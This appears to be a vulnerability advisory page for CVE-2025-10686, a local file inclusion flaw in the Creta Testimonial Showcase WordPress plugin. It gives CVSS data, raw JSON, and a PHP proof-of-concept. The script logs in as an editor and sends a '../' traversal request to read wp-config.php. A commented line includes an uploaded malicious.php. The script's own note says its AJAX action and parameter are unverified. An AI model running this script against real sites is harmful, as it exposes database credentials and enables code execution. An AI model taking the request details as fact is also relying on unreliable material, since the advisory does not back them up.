Security Vulnerability Report
CVE-2025-10686 CVSS 7.2 HIGH

CVE-2025-10686

Published: 2025-11-14 06:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Creta Testimonial Showcase WordPress plugin before 1.2.4 is vulnerable to Local File Inclusion. This makes it possible for authenticated attackers, with editor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Creta Testimonial Showcase WordPress plugin < 1.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
// CVE-2025-10686 PoC - Local File Inclusion in Creta Testimonial Showcase < 1.2.4
// Requires an editor-level (or higher) WordPress account: the request below is
// only issued with an authenticated session, consistent with PR:H in the CVSS vector.
// NOTE(review): the `creta_testimonial_file_include` AJAX action and its `file`
// parameter are not corroborated by the advisory text or the WPScan reference on
// this page; treat this request shape as unverified until checked against the plugin source.
$target = 'http://target-wordpress-site.com';
$username = 'editor_user';
$password = 'editor_password';

// Step 1: authenticate against wp-login.php and persist the session cookies in
// cookies.txt (CURLOPT_COOKIEJAR) so the follow-up request is sent as that user.
$login_url = $target . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => '/wp-admin/',
    'testcookie' => '1'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);

// Step 2: the LFI request - a relative path with `../` traversal in the `file`
// query parameter of an admin-ajax.php action, reusing the cookies saved above
// (CURLOPT_COOKIEFILE). For detection: an authenticated editor session issuing
// admin-ajax.php requests whose `file` parameter contains traversal sequences is
// the pattern to alert on in web-server and WAF logs.
$exploit_url = $target . '/wp-admin/admin-ajax.php?action=creta_testimonial_file_include&file=../../wp-config.php';
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

// If RCE is possible, include a malicious uploaded file
// $rce_url = $target . '/wp-admin/admin-ajax.php?action=creta_testimonial_file_include&file=../../uploads/malicious.php';
curl_close($ch);

// The result of curl_exec() is never checked, so an empty $response cannot be
// distinguished from a transport failure or a failed login.
echo 'Response: ' . $response;
?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10686", "sourceIdentifier": "[email protected]", "published": "2025-11-14T06:15:42.567", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Creta Testimonial Showcase WordPress plugin before 1.2.4 is vulnerable to Local File Inclusion. This makes it possible for authenticated attackers, with editor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://wpscan.com/vulnerability/27d58c5a-ab87-41aa-a806-53fa96d4351c/", "source": "[email protected]"}]}}